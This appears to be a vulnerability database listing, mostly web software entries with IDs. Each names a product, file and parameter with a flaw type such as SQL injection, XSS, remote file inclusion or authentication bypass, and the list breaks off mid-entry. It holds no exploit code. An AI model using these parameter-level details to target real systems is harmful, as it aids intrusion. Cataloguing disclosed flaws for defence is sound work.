PHP Top Webs config.php full_path Parameter Remote File Inclusion [30862] phpWebSite Multiple Script PHPWS_SOURCE_DIR Parameter Remote File Inclusion [30800] Web Server Creator index.php pg Parameter Remote File Inclusion [30799] Web Server Creator customize.php l Parameter Remote File Inclusion [30754] SAP Web Application Server enserver.exe Unspecified Remote DoS [30753] SAP Web Application Server Unspecified Arbitrary File Access [30751] web-app.org WebAPP Poll Form Submission Unspecified Input Validation Weakness [30750] web-app.org WebAPP Search Feature Crafted Input Path Disclosure [30749] web-app.org WebAPP Unspecified URL Manipulation Private Forum Authentication Bypass [30748] web-app.org WebAPP Crafted URL Private Thread Last Post Disclosure [30747] web-app.org WebAPP Search Feature Unspecified XSS [30746] web-app.org WebAPP Search Feature Private Forum Disclosure [30726] Apple Mac OS X WebKit HTML File Handling Remote Code Execution [30694] MailEnable WebAdmin Blank Password Authentication Bypass [30680] Wallpaper Website wallpaper.php wallpaperid Parameter SQL Injection [30679] Recipes Website list.php categoryid Parameter SQL Injection [30678] Recipes Website recipe.php recipeid Parameter SQL Injection [30599] OpenEMR interface/login/login.php srcdir Parameter Remote File Inclusion [30585] phpWebFTP script.js Information Disclosure [30581] Enthrallweb eHomes result.asp Multiple Parameter XSS [30580] Enthrallweb eHomes result.asp Multiple Parameter SQL Injection [30579] Enthrallweb eHomes compareHomes.asp Multiple Parameter SQL Injection [30578] Enthrallweb eHomes homeDetail.asp AD_ID Parameter SQL Injection [30577] Enthrallweb eHomes types.asp TYPE_ID Parameter SQL Injection [30576] Enthrallweb eHomes dirSub.asp sid Parameter SQL Injection [30575] Enthrallweb eHomes dircat.asp cid Parameter SQL Injection [30573] Enthrallweb eClassifieds dirSub.asp sid Parameter SQL Injection [30572] Enthrallweb eClassifieds dircat.asp cid Parameter SQL Injection [30571] Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection [30570] my little weblog weblog.php action Parameter XSS [30534] IBM WebSphere Application Server (WAS) Unspecified Issue (PK30831) [30533] IBM WebSphere Application Server (WAS) Eal4 Authentication Checking Issue [30532] IBM WebSphere Application Server (WAS) Unspecified Issue (PK29725) [30522] BestWebApp Dating Site login_form.asp msg Parameter XSS [30521] BestWebApp Dating Site Login Component Multiple Field SQL Injection [30503] phpWebThings core/editor.php Multiple Parameter Remote File Inclusion [30485] Enthrallweb eShopping Cart subProducts.asp Multiple Parameter SQL Injection [30484] Enthrallweb eShopping Cart productdetail.asp ProductID Parameter SQL Injection [30483] Enthrallweb eShopping Cart reviews.asp ProductID Parameter SQL Injection [30454] Selenium Server Web Server XSS [30450] 4D WebSTAR libucache.dylib Path Subversion Privilege Escalation [30430] WWWeb Concepts CactuShop product.asp product Parameter SQL Injection [30429] WWWeb Concepts CactuShop prodtype.asp prodtype Parameter SQL Injection [30352] BEA WebLogic Unspecified HTTP Request Smuggling Header Injection [30264] REMLAB Web Mech Designer calculate.php Tonnage Parameter Path Disclosure [30254] FreeWebshop.org Script index.php cat Parameter XSS [30253] FreeWebshop.org Script index.php page Parameter Traversal Arbitrary File Access [30241] bj Http Web Server Default Administrator Password [30201] Webdrivers Simple Forum message_details.php id Parameter SQL Injection [30195] apt-webshop-system message Parameter XSS [30188] FreeWebshop.org Script index.php action Parameter Traversal Arbitrary File Access [30187] FreeWebshop.org Script index.php Multiple Parameter SQL Injection [30174] Easy Address Book Web Server Crafted Request ADS Arbitrary File Access [30166] Sun ONE/Java System Web Server NSS Unspecified Remote DoS [30164] BlooMooWeb ActiveX control (AidemATL.dll) BW_DeleteTempFile Method filePath Parameter Arbitrary File Deletion [30163] BlooMooWeb ActiveX control (AidemATL.dll) BW_LaunchGame Method bstrParams Parameter Arbitrary Local File Execution [30162] BlooMooWeb ActiveX control (AidemATL.dll) BW_DownloadFile Method bstrUrl Parameter Arbitrary File Download [30150] Easy File Sharing Web Server Crafted Request ADS Arbitrary File Access [30149] Easy File Sharing Web Server Forum Post Multiple Field XSS [30131] Simple Website Software common.php SWSDIR Parameter Remote File Inclusion [30076] INCA IM-204 webcm getpage Traversal Arbitrary File Access [30062] MDweb country_insert.php chemin_appli Parameter Remote File Inclusion [30061] MDweb form_org.inc.php chemin_appli Parameter Remote File Inclusion [30056] MiniHTTP Web Forum join.asp Arbitrary Account Manipulation [30049] Sun Java System Messaging Server Webmail Message XSS [30045] D-Link DSL-G624T cgi-bin/webcm Multiple Variable POST Method XSS [30044] D-Link DSL-G624T cgi-bin/webcm getpage Parameter Traversal Arbitrary File Access [29999] Novell GroupWise WebAccess ndsobj.nlm Information Disclosure [29969] Trawler Web CMS extras/downloads/index.php path_red Parameter Remote File Inclusion [29968] Trawler Web CMS share/insert1.php path_scr_dat2 Parameter Remote File Inclusion [29967] Trawler Web CMS richtext/newfile.php path_red2 Parameter Remote File Inclusion [29966] Trawler Web CMS richtext/lese_inc.php path_red2 Parameter Remote File Inclusion [29965] Trawler Web CMS richtext/farbpalette.php path_red2 Parameter Remote File Inclusion [29964] Trawler Web CMS richtext/extras_menu.php path_red2 Parameter Remote File Inclusion [29963] Trawler Web CMS richtext/colorpik3.php path_red2 Parameter Remote File Inclusion [29962] Trawler Web CMS richtext/colorpik2.php path_red2 Parameter Remote File Inclusion [29961] Trawler Web CMS richtext/addtort.php path_red2 Parameter Remote File Inclusion [29960] Trawler Web CMS redaktion/artikel/up/index.php path_red2 Parameter Remote File Inclusion [29882] iWebNegar comments.php id Parameter SQL Injection [29881] iWebNegar comments.php comment Parameter XSS [29846] Comdev Web Blogger adminfoot.php path[docroot] Parameter Remote File Inclusion [29765] Motorola SURFboard SB4200 HTTP Interface Crafted MfcISAPICommand Request DoS [29755] IronMail IronWebMail IM_FILE Identifier Encoded Traversal Arbitrary File Access [29731] NuralStorm Webmail process.php DEFAULT_SKIN Parameter Remote File Inclusion [29722] SafeWord RemoteAccess signers.cfg UserCenter Webportal Password Cleartext Disclosure [29721] SafeWord RemoteAccess login.conf UserCenter Webportal base-64 Encoded Password Disclosure [29664] WebYep webyep.php webyep_sIncludePath Parameter Remote File Inclusion [29663] WebYep WYShortTextElement.php webyep_sIncludePath Parameter Remote File Inclusion [29662] WebYep WYMenuElement.php webyep_sIncludePath Parameter Remote File Inclusion [29661] WebYep WYLoopElement.php webyep_sIncludePath Parameter Remote File Inclusion [29660] WebYep WYLongTextElement.php webyep_sIncludePath Parameter Remote File Inclusion [29659] WebYep WYLogonButtonElement.php webyep_sIncludePath Parameter Remote File Inclusion [29658] WebYep WYImageElement.php webyep_sIncludePath Parameter Remote File Inclusion [29657] WebYep WYGuestbookElement.php webyep_sIncludePath Parameter Remote File Inclusion [29656] WebYep WYGalleryElement.php webyep_sIncludePath Parameter Remote File Inclusion [29655] WebYep WYTextArea.php webyep_sIncludePath Parameter Remote File Inclusion [29654] WebYep WYSelectMenu.php webyep_sIncludePath Parameter Remote File Inclusion [29653] WebYep WYPopupWindowLink.php webyep_sIncludePath Parameter Remote File Inclusion [29652] WebYep WYPath.php webyep_sIncludePath Parameter Remote File Inclusion [29651] WebYep WYLink.php webyep_sIncludePath Parameter Remote File Inclusion [29650] WebYep WYLanguage.php webyep_sIncludePath Parameter Remote File Inclusion [29649] WebYep WYImage.php webyep_sIncludePath Parameter Remote File Inclusion [29648] WebYep WYHTMLTag.php webyep_sIncludePath Parameter Remote File Inclusion [29647] WebYep WYFile.php webyep_sIncludePath Parameter Remote File Inclusion [29646] WebYep WYElement.php webyep_sIncludePath Parameter Remote File Inclusion [29645] WebYep WYEditor.php webyep_sIncludePath Parameter Remote File Inclusion [29644] WebYep WYDocument.php webyep_sIncludePath Parameter Remote File Inclusion [29643] WebYep WYApplication.php webyep_sIncludePath Parameter Remote File Inclusion [29615] IBM WebSphere Application Server (WAS) Unspecified Security Exposure (PK29360) [29614] IBM WebSphere Application Server (WAS) Wsn Security Authentication Bypass [29613] IBM WebSphere Application Server (WAS) Unspecified JSP Source Disclosure (PK23475) [29587] Webmedia Explorer includes/core.lib.php path_include Parameter Remote File Inclusion [29507] XEROX WorkCentre ESS/ Network Controller / MicroServer Web Server Arbitrary Command Execution [29480] WEBInsta CMS modules/usersonline/users.php module_dir Parameter Remote File Inclusion [29476] WebTorrent torrents.php cat Parameter SQL Injection [29368] TinyWebGallery image.php2 image Parameter Remote File Inclusion [29367] TinyWebGallery image.php image Parameter Remote File Inclusion [29303] Comdev Web Blogger include.php path[docroot] Parameter Remote File Inclusion [29279] phpMyWebmin window.php Multiple Parameter Remote File Inclusion [29278] phpMyWebmin home.php target Variable Arbitrary Directory Listing [29277] phpMyWebmin window.php target Variable Arbitrary Directory Listing [29273] Apple Mac OS X Preferences Account Manipulation WebObjects Application Privilege Persistence [29257] NaviCOPA Web Server GET Request Remote Overflow [29234] CERN httpd Double Slash Protected Webpage Bypass [29227] WEB//NEWS parser.php WN_BASEDIR Parameter Remote File Inclusion [29223] Sun Secure Global Desktop ttawebtop.cgi XSS [29207] Pie Cart Pro weblinks.php Inc_Dir Parameter Remote File Inclusion [29191] WEBInsta Mailing List Manager install3.php cabsolute_path Parameter Remote File Inclusion [29142] Neon WebMail for Java updateuser Servlet in_name Parameter XSS [29141] Neon WebMail for Java downloadfile Servlet Traversal Arbitrary File Access [29140] Neon WebMail for Java updateuser Servlet in_id Variable Arbitrary User Information Modification [29139] Neon WebMail for Java maillist Servlet Multiple Parameter SQL Injection [29138] Neon WebMail for Java addrlist Servlet Multiple Parameter SQL Injection [29137] Neon WebMail for Java updatemail Servlet Arbitrary Mail Message Manipulation [29136] Neon WebMail for Java File Attachment Arbitrary JSP Execution [29106] Web-News template.php content_page Parameter Remote File Inclusion [29103] xweblog kategori.asp kategori Parameter SQL Injection [29088] SQLiteWebAdmin table_editfield.php table Parameter SQL Injection [29087] SQLiteWebAdmin tpl.inc.php conf[classpath] Parameter Remote File Inclusion [29086] SaveWebPortal poll/view_polls.php SITE_Path Parameter Remote File Inclusion [29085] SaveWebPortal poll/poll.php SITE_Path Parameter Remote File Inclusion [29037] Cisco IPS/IDS Web Administration Malformed SSLv2 Client Hello DoS [29025] DigitalWebShop rechnung.php _PHPLIB[libdir] Parameter Remote File Inclusion [29023] Dr.Web Anti-virus LHA Archive Directory Name Overflow [29022] Business Card Web Builder (BCWB) startup.inc.php root_path Parameter Remote File Inclusion [29009] CA eSCC / eTrust Audit Web Server Path Disclosure [28945] Easy Address Book Web Server Query Remote Format String [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS [28895] Oracle WebDAV Unspecified HTTP DoS [28874] Oracle E-Business Suite Self-Service Web Applications icx_ticket Authentication Bypass [28804] webSPELL admin/database.php userID Parameter Database Disclosure [28803] webSPELL squads.php squadID Parameter SQL Injection [28760] Caucho Resin /WEB-INF/ Crafted Request Authentication Bypass [28749] MyABraCaDaWeb pop.php base Parameter Remote File Inclusion [28748] MyABraCaDaWeb index.php base Parameter Remote File Inclusion [28743] Mono/C# Web Server mod_mono xsp Component Traversal Arbitrary File Access [28673] D-Link DSL-G604T /cgi-bin/webcm getpage Parameter Traversal Arbitrary File Access [28548] Alt-N WebAdmin useredit_account.wdm Module MDaemon Account Access [28547] Web Dictate Null Password Authentication Bypass [28394] Indexu admin/checkurl_web.php Multiple Parameter Remote File Inclusion [28375] SnapGear web-admin Server Unspecified Race Condition [28374] SnapGear web-admin Unspecified Issue [28338] Webmin/Usermin NULL Character Unspecified XSS [28337] Webmin/Usermin NULL Character Unspecified Source Disclosure [28300] SAP DB / MaxDB WebDBM Client Database Name Remote Overflow [28294] 04WebServer CGI Source Disclosure [28293] 04WebServer Unspecified OpenSSL Data Request DoS [28292] 04WebServer URL Processing Unspecified Information Disclosure [28248] Web3news _class.security.php PHPSECURITYADMIN_PATH Parameter Remote File Inclusion [28192] Webvizyon Portal SayfalaAltList.asp ID Parameter SQL Injection [28171] 2Wire Gateway Web Server CRLF DoS [28124] Alt-N WebAdmin Administrator Privilege Mismatch Unauthorized Account Manipulation [28123] Alt-N WebAdmin logfile_view.wdm file Parameter Traversal Arbitrary File Access [28122] Alt-N WebAdmin configfile_view.wdm file Parameter Traversal Arbitrary File Access [28109] Sun Java Plugin and Web Start Version Specification Weakness [28039] Archangel Weblog Multiple Field XSS [27948] WEBInsta CMS index.php templates_dir Parameter Remote File Inclusion [27941] 04WebServer Unspecified User Identification Bypass [27940] 04WebServer Error Page XSS [27928] Webring for Joomla admin.webring.docs.php component_dir Parameter Remote File Inclusion [27918] Douran FollowWeb register.aspx XSS [27909] Symantec Backup Exec Remote Agent RPC Interface Multiple Unspecified Overflows [27907] SaralBlog view.php website XSS [27892] IBM WebSphere Application Server (WAS) LDAP Lookup Cached Response Unspecified Issue [27891] IBM WebSphere Application Server (WAS) Trace Information Disclosure [27890] IBM WebSphere Application Server (WAS) wsadmin Command Line Information Disclosure [27889] IBM WebSphere Application Server (WAS) Unspecified mbean Issue [27888] IBM WebSphere Application Server (WAS) ThreadIdentitySupport Unspecified Authority Issue [27887] IBM WebSphere Application Server (WAS) SOAP Request/Response Unspecified Issue [27880] Hitweb genpage-cgi.php REP_INC Parameter Remote File Inclusion [27857] Comet WebFileManager (CWFM) CheckUpload.php Language Parameter Remote File Inclusion [27820] Novell GroupWise WebAccess Login Page GWAP.version Parameter XSS [27819] Novell GroupWise WebAccess Malformed SCRIPT Tag XSS [27818] Novell GroupWise WebAccess UTF-7 Encoded Message XSS [27808] Cisco Linksys WRT54G Web Admin Console CSRF [27787] CA eTrust Antivirus WebScan ActiveX Control Update Manifest Processing Overflow [27786] CA eTrust Antivirus WebScan ActiveX Control Crafted File Protection Weakness [27785] CA eTrust Antivirus WebScan ActiveX Control Crafted File Update Subversion [27744] Apple Mac OS X WebKit Malformed HTML Deallocated Object Access DoS [27696] VMware ESX Server Web Server Log Cleartext Password Disclosure [27695] VMware ESX Server Management Interface Session Cookie Password Encryption Weakness [27671] aWebNews login.php page Parameter Arbitrary File Access [27670] aWebNews visview.php path_to_news Parameter Remote File Inclusion [27598] IBM WebSphere Form-based Authentication Multiple Variable Remote Overflow [27587] Sun Java System Application/Web Server Unspecified Arbitrary File Disclosure [27577] Mozilla Multiple Products nsQueryInterface::operator() Function Removed Node Reference Code Execution [27531] Novell GroupWise WebAccess webacc Multiple Parameter XSS [27505] WeBBoA Hosting id Parameter SQL Injection [27390] WebScarab Proxy XSS [27330] IceWarp WebMail admin/inc/include.php lang_settings Parameter Traversal Local File Inclusion [27329] IceWarp WebMail /mail/settings.html language Parameter Traversal Local File Inclusion [27328] IceWarp WebMail accounts/inc/include.php language Parameter Traversal Local File Inclusion [27159] Cisco Router Web Setup (CRWS) Default Configuration Authentication Bypass [27141] CMS Mundo Webshop Module id Parameter SQL Injection [27138] Drupal webform Module XSS [27131] Juniper Networks DX System Web Admin Log Script XSS [27116] MIMEsweeper for Web Encrypted RAR Processing DoS [27115] MIMEsweeper for Web Blocked Site Message XSS [27110] Microsoft IE WebViewFolderIcon setSlice Overflow [27077] ASPjar Guestbook Message Web Site Field XSS [27076] askSam Web Publisher Nonexistent File Request Path Disclosure [27075] askSam Web Publisher as_web4.exe XSS [27074] askSam Web Publisher as_web.exe XSS [27040] WebEx Downloader Plug-in ActiveX Unspecified Remote Code Execution [27039] WebEx Downloader Plug-in ActiveX/Java Source Subversion Arbitrary Program Execution [27009] PHPWebGallery comments.php keyword Parameter XSS [26912] Joomla! Weblinks Feature SQL Injection [26880] Cisco Wireless Control System (WCS) HTTP Interface Login Page Unspecified XSS [26843] Dating Agent PRO webmaster/index.php login Parameter XSS [26772] Webmin/Usermin simplify_path() Failure Arbitrary File Disclosure [26771] Webmin on Windows Crafted Backslash Request Traversal Arbitrary File Access [26766] Open WebMail (OWM) openwebmail-read.pl from Parameter XSS [26764] IBM WebSphere Application Server (WAS) Unspecified UserNameToken Cache Improper Use [26763] IBM WebSphere Application Server (WAS) Unspecified JSP Source Disclosure (PK22928) [26761] IBM WebSphere Application Server (WAS) Trace Datasource Password Cleartext Disclosure [26626] Joomla! Web Link Submission title Parameter SQL Injection [26624] Mambo Web Link Submission title Parameter SQL Injection [26550] PHPWebGallery search.php id Parameter XSS [26454] Cisco WebVPN Clientless Mode connecterror.html XSS [26453] Cisco WebVPN Clientless Mode dnserror.html domain Parameter XSS [26441] Microsoft Exchange Server Outlook Web Access HTML Parsing Unspecified XSS [26410] MailEnable Enterprise WebMail ListAttachments.asp Password Disclosure [26409] MailEnable Enterprise WebMail uploadcontact.asp Arbitrary File Upload [26408] MailEnable Enterprise WebMail UploadAttachment.asp Arbitrary File Upload [26407] MailEnable Enterprise WebMail Resolve.asp Arbitrary Draft Folder Mail Creation [26406] MailEnable Enterprise WebMail MailOptions.asp LoginRights Variable Privilege Escalation [26405] MailEnable Enterprise WebMail main.asp POSTOFFICE Variable Authentication Bypass [26340] webprojectdb lang.php INCDIR Parameter Remote File Inclusion [26339] webprojectdb nav.php INCDIR Parameter Remote File Inclusion [26329] 4D WebSTAR Server Log Remote Disclosure [26321] Cabacos Web CMS Suchergebnisse.asp suchtext Parameter XSS [26267] CGI-RESCUE WebFORM / FORM2MAIL Arbitrary Mail Header Injection [26156] TIBCO Hawk Hawk Monitoring Agent Configuration Interface Local Overflow [26155] TIBCO Rendezvous Multiple Products HTTP Administrative Interface Remote Overflow [26105] F@cile Interactive Web Multiple p-themes Directory index.inc.php myskin Parameter XSS [26104] F@cile Interactive Web index.php lang Parameter XSS [26103] F@cile Interactive Web Multiple p-themes Directory index.inc.php mytheme Parameter Remote File Inclusion [26102] F@cile Interactive Web p-editbox.php pathfile Parameter Remote File Inclusion [26101] F@cile Interactive Web p-editpage.php pathfile Parameter Remote File Inclusion [26100] F@cile Interactive Web p-popupgallery.php l Parameter Remote File Inclusion [26086] V-webmail pop3.php CONFIG[pear_dir] Parameter Remote File Inclusion [26085] V-webmail core.php CONFIG[pear_dir] Parameter Remote File Inclusion [26040] HyperStop Web Host Directory Write a Review Box XSS [26039] HyperStop Web Host Directory Login Username Variable Path Disclosure [26038] AlstraSoft Web Host Directory Write a Review Box XSS [26037] AlstraSoft Web Host Directory Login Username Variable Path Disclosure [26036] AlstraSoft Web Host Directory Search Function uri Parameter SQL Injection [26012] EVA-Web index.php Multiple Variable Path Disclosure [26011] EVA-Web index.php Multiple Parameter XSS [26010] EVA-Web rubrique.php3 date Parameter XSS [26009] EVA-Web article-album.php3 debut_image Parameter XSS [26002] BlueShoes Framework websearchengine/Bs_Wse_Profile.class.php APP[path][plugins] Parameter Remote File Inclusion [25995] WebspotBlogging inc/mainheader.inc.php path Parameter Remote File Inclusion [25994] WebspotBlogging inc/global.php path Parameter Remote File Inclusion [25993] WebspotBlogging inc/adminheader.inc.php path Parameter Remote File Inclusion [25992] WebspotBlogging inc/logincheck.inc.php path Parameter Remote File Inclusion [25971] Weblog Oggi Comment Body XSS [25962] aspWebLinks links.asp linkID Parameter SQL Injection [25938] WeBWorK PGProblemEditor.pm Traversal Arbitrary File Manipulation [25937] F-Secure Multiple Products Web Console Pre-authentication Overflow [25927] Spymac WebOS login.php XSS [25926] Spymac WebOS get_ipod.php curr Parameter XSS [25925] Spymac WebOS index.php Multiple Parameter XSS [25893] Fujitsu MyWeb Products Unspecified SQL Injection [25889] Apple Mac OS X Xcode Tools WebObjects Plugin Project Manipulation [25857] Destiney Rated Images Script addWeblog.php XSS [25846] Symantec Client Security / AntiVirus Management Interface Remote Overflow [25842] WebCalendar index.php includedir Function Remote File Inclusion [25833] IceWarp WebMail index.html PHPSESSID Parameter XSS [25831] HyperStop Web Host Directory /search/index.php uri Parameter SQL Injection [25807] MY Web Server URL Processing Overflow DoS [25738] PunkBuster WebTool webkey Authentication Overflow [25682] Limbo CMS weblinks.html.php catid Parameter SQL Injection [25634] Sun ONE/Java System Web Server Error Page XSS [25626] Bitrix Site Manager Admin Interface Multiple XSS [25607] Blog Mod weblog_posting.php r Parameter SQL Injection [25559] Website Baker details.php display_name Parameter XSS [25557] BEA WebLogic SOAP Fault Stack Trace Information Disclosure [25556] BEA WebLogic Invalid XML Exception Information Disclosure [25555] BEA WebLogic GetIORServlet Internal Server Information Disclosure [25554] BEA WebLogic T3 Connection Internal Information Disclosure [25553] BEA WebLogic stopWeblogic.sh Cleartext Administrator Password Disclosure [25552] BEA WebLogic Untrusted Application Private Key Disclosure [25551] BEA WebLogic JDBC Security Policy Setting Failure [25550] BEA WebLogic Server Log Cleartext Authentication Credential Disclosure [25549] BEA WebLogic Administration Console Login Form Domain Name Disclosure [25548] BEA WebLogic Administration Console Internal IP Address Disclosure [25547] BEA WebLogic Compilation Error JSP Source Disclosure [25546] BEA WebLogic Password Reset Mechanism Cleartext Admin Password Disclosure [25545] BEA WebLogic Client Connection Manager QoS Protocol Downgrade [25544] BEA WebLogic JTA Transaction Cleartext Information Disclosure [25468] Web-Labs CMS E-mail Alert Signup Multiple Field XSS [25467] Web-Labs CMS Search Function search Parameter XSS [25453] Cisco PIX/ASA/FWSM WebSense URL Filter Bypass [25424] IBM WebSphere Application Server (WAS) Web Container JSP Source Disclosure (PK20181,PK13792) [25423] IBM WebSphere Application Server (WAS) Client Verification Unspecified Issue [25422] IBM WebSphere Application Server (WAS) Trace Database Password Cleartext Disclosure [25420] IBM WebSphere Application Server (WAS) Trace Unspecified Information Disclosure (PK11017) [25418] IBM WebSphere Application Server (WAS) Session Trace Unspecified Information Disclosure (PK05011) [25417] IBM WebSphere Application Server (WAS) Session Trace Information Disclosure (PK05011) [25415] IBM WebSphere Application Server (WAS) Publish/subscribe Behaviour Issue [25414] IBM WebSphere Application Server (WAS) specj One Phase Commit Optimization Unspecified Issue [25413] IBM WebSphere Application Server (WAS) FFDC Log Information Disclosure (PK04923\|PK07366) [25412] IBM WebSphere Application Server (WAS) Set-Cookie Header Expiration Failure [25411] IBM WebSphere Application Server (WAS) JMS Message Processing DoS [25410] IBM WebSphere Application Server (WAS) Plug-in Malformed Request DoS [25407] IBM WebSphere Application Server (WAS) FFDC Log Cleartext Password Disclosure (PK02503) [25406] IBM WebSphere Application Server (WAS) META-INF / WEB-INF Directory Access [25405] IBM WebSphere Application Server (WAS) Unspecified Password Disclosure (PK03448 #1) [25404] IBM WebSphere Application Server (WAS) Unspecified Password Disclosure (PK03448 #2) [25403] IBM WebSphere Application Server (WAS) Unspecified Secint XSS (PQ99687) [25402] IBM WebSphere Application Server (WAS) ORBRas Trace Truststore Cleartext Password Disclosure [25401] IBM WebSphere Application Server (WAS) EJB Security Role Mismatch [25400] IBM WebSphere Application Server (WAS) on Windows Registry Cleartext Credential Disclosure [25399] IBM WebSphere Application Server (WAS) URL Pattern Matching Failure [25398] IBM WebSphere Application Server (WAS) Directory Request Page Authentication Bypass [25397] IBM WebSphere Application Server (WAS) Unspecified HTTP Response Splitting [25396] IBM WebSphere Application Server (WAS) Role Name Change Security Constraint Failure [25395] IBM WebSphere Application Server (WAS) ESI/plugin Cached Secure Content Disclosure [25394] IBM WebSphere Application Server (WAS) JVM MBEAN Disclosure [25393] IBM WebSphere Application Server (WAS) Cloudscape Unspecified Exposure [25392] IBM WebSphere Application Server (WAS) Administrative Console Unspecified Issue [25391] IBM WebSphere Application Server (WAS) SSL Offloader Protocol Mismatch Information Disclosure [25390] IBM WebSphere Application Server (WAS) J_password Trace Cleartext Disclosure [25389] IBM WebSphere Application Server (WAS) Global Security CA Trust Overide [25388] IBM WebSphere Application Server (WAS) stdout Cleartext Password Disclosure [25387] IBM WebSphere Application Server (WAS) FFDC Log JMS Wrapped Object Cleartext Password Disclosure [25386] IBM WebSphere Application Server (WAS) Private HTTP Header Disclosure [25385] IBM WebSphere Application Server (WAS) FFDC Log Cleartext Password Disclosure (PQ79848) [25384] IBM WebSphere Application Server (WAS) ESI Cache Component simplefileservlet Exposure [25383] IBM WebSphere Application Server (WAS) MQ Queue Destination Cleartext Password Disclosure [25382] IBM WebSphere Application Server (WAS) ConnectionFactories Binding Info Unspecified Issue [25381] IBM WebSphere Application Server (WAS) ESIInvalidatorControllerProxyImpl Unspecified Access Issue [25380] IBM WebSphere Application Server (WAS) v6 Trace Cleartext Database Password Disclosure [25379] IBM WebSphere Application Server (WAS) HTTP Request Handlers Unspecified Exposure [25378] IBM WebSphere Application Server (WAS) Caching Proxy Error Page XSS [25377] IBM WebSphere Application Server (WAS) Trace Session Context Information Disclosure [25375] IBM WebSphere Application Server (WAS) on Solaris Corrupt Token Authentication Bypass [25374] IBM WebSphere Application Server (WAS) Multiple Model Trace Information Disclosure (PK14566) [25373] IBM WebSphere Application Server (WAS) HTTP Request Handlers Unspecified Exposure [25372] IBM WebSphere Application Server (WAS) addNode.log Cleartext Credential Disclosure (PK16492) [25371] IBM WebSphere Application Server (WAS) SOAP Port Unspecified Issue [25370] IBM WebSphere Application Server (WAS) Administrative Console Unspecified Issue [25369] IBM WebSphere Application Server (WAS) URL Unspecified Script Execution (PK15571) [25368] IBM WebSphere Application Server (WAS) Welcome Page Security Bypass [25359] openEngine website.php template Parameter Local File Inclusion [25299] SWS Web Server Syslog Call Format String [25298] SWS Web Server Long Request Overflow [25288] Web4Future Portal Solutions view.php ID Parameter XSS [25287] Web4Future Portal Solutions comentarii.php ID Parameter XSS [25286] Web4Future Portal Solutions view.php ID Parameter SQL Injection [25285] Web4Future Portal Solutions comentarii.php ID Parameter SQL Injection [25283] Xeneo Web Server Crafted Request Script Source Disclosure [25280] WebCalendar Login Error Message User Account Enumeration [25257] Big Webmaster Guestbook addguest.cgi Multiple Field XSS [25245] Quagga bgpd Telnet Interface Local DoS [25211] Websense Crafted URL Uncategorized Filter Bypass [25146] WebGlimpse webglimpse.cgi Unspecified XSS [25066] Network Administration Visualized (NAV) Report Interface SQL Injection [25063] Kmail webdisk.php ordner Parameter XSS [25000] Oc\xE9 3121/3122 Printer Web Server Overflow DoS [24975] phpWebFTP index.php port Parameter XSS [24971] Fujitsu NetShelter/FW Web Cache/Proxy Unspecified DNS Packet Handling Remote DoS [24952] Manila editInBrowser Webpage Exmple Field XSS [24939] PHPWebGallery picture.php cat Variable Arbitrary Picture Disclosure [24872] WebGlimpse URL Control Character Arbitrary Command Execution [24871] WebGlimpse InputSyntax Commercial Module Command Execution [24843] Oracle E-Business Suite Diagnostics Interfaces Unspecified HTTP Issue [24815] WebCleaner Unspecified HTML Security Bypass [24806] Asterisk Recording Interface (ARI) misc/audio.php recording Parameter Traversal Arbitrary File Access [24805] Asterisk Recording Interface (ARI) includes/main.conf Remote Credential Disclosure [24707] phpWebFTP index.php language Parameter Traversal Arbitrary File Access [24688] phpWebSite topics.php topic Parameter SQL Injection [24646] phpWebSite index.php hub_dir Arbitrary File Inclusion [24632] TinyWebGallery (TWG) index.php twg_album Parameter XSS [24629] HP System Management Homepage (SMH) Crafted URL Interface Authentication Bypass [24621] Web+Shop store.wml storeid Variable Path Disclosure [24594] IBM WebSphere Large HTTP Header Request DoS [24573] Awebs Banner Generator index.php banner Parameter XSS [24572] Awebs Scripts Seller buy.php Predictable Cookie Authentication Bypass [24536] WebCalendar /includes/menu/index.php Direct Request Path Disclosure [24535] WebCalendar /includes/js/pref.php Direct Request Path Disclosure [24534] WebCalendar /includes/js/popups.php Direct Request Path Disclosure [24533] WebCalendar /includes/js/export_import.php Direct Request Path Disclosure [24532] WebCalendar /includes/js/edit_layer.php Direct Request Path Disclosure [24531] WebCalendar /includes/js/edit_entry.php Direct Request Path Disclosure [24530] WebCalendar /includes/js/admin.php Direct Request Path Disclosure [24529] WebCalendar /includes/settings.php.orig Direct Request Path Disclosure [24528] WebCalendar /includes/settings.php Direct Request Path Disclosure [24527] WebCalendar /includes/index.php Direct Request Path Disclosure [24526] WebCalendar /includes/init.php Direct Request Path Disclosure [24525] WebCalendar /tests/all_tests.php Direct Request Path Disclosure [24524] WebCalendar /tests/add_duration_test.php Direct Request Path Disclosure [24523] WebCalendar nonusers.php Direct Request Path Disclosure [24522] WebCalendar groups.php Direct Request Path Disclosure [24511] Web+Shop department.wml deptname Parameter XSS [24504] PHPWebGallery picture.php Multiple Parameter XSS [24503] PHPWebGallery category.php Multiple Parameter XSS [24477] apt-webshop-system modules.php Remote File Inclusion [24476] apt-webshop-system Malformed SQL Query Path Disclosure [24475] apt-webshop-system artikel Module Multiple Parameter SQL Injection [24469] Cherokee Web Server Error 400 XSS [24379] WebMe Multiple Unspecified Security Issues [24366] McAfee WebShield SMTP Bounce Message Format String [24352] aWebBB search.php q Parameter SQL Injection [24351] aWebBB reply_log.php Username Parameter SQL Injection [24350] aWebBB reply.php Username Parameter SQL Injection [24349] aWebBB post.php Username Parameter SQL Injection [24348] aWebBB ndis.php Multiple Parameter SQL Injection [24347] aWebBB login.php Username Parameter SQL Injection [24346] aWebBB list.php c Parameter SQL Injection [24345] aWebBB fpass.php Username Parameter SQL Injection [24344] aWebBB feedback.php Username Parameter SQL Injection [24343] aWebBB editac.php Username Parameter SQL Injection [24342] aWebBB dpost.php p Parameter SQL Injection [24341] aWebBB changep.php Username Parameter SQL Injection [24340] aWebBB accounts.php Username Parameter SQL Injection [24339] aWebBB editac.php Multiple Parameter XSS [24338] aWebBB register.php Multiple Parameter XSS [24337] aWebBB post.php Multiple Parameter XSS [24336] aWebNews visview.php _GET['cid'] Parameter SQL Injection [24335] aWebNews fpass.php user123 Parameter SQL Injection [24334] aWebNews login.php user123 Parameter SQL Injection [24333] aWebNews visview.php Multiple Parameter XSS [24295] Hitachi Groupmax World Wide Web Multiple Products Unspecified XSS [24279] web-app.net WebAPP mods/calendar/index.cgi vsSD Parameter XSS [24278] web-app.net WebAPP index.cgi Multiple Parameter XSS [24178] Blazix Web Server Crafted Filename Extension JSP Source Disclosure [24160] WEBalbum skin2 Cookie Parameter Traversal Local File Inclusion [24130] Web Quiz student.asp msg Parameter XSS [24129] Web Quiz prequiz.asp exam Parameter 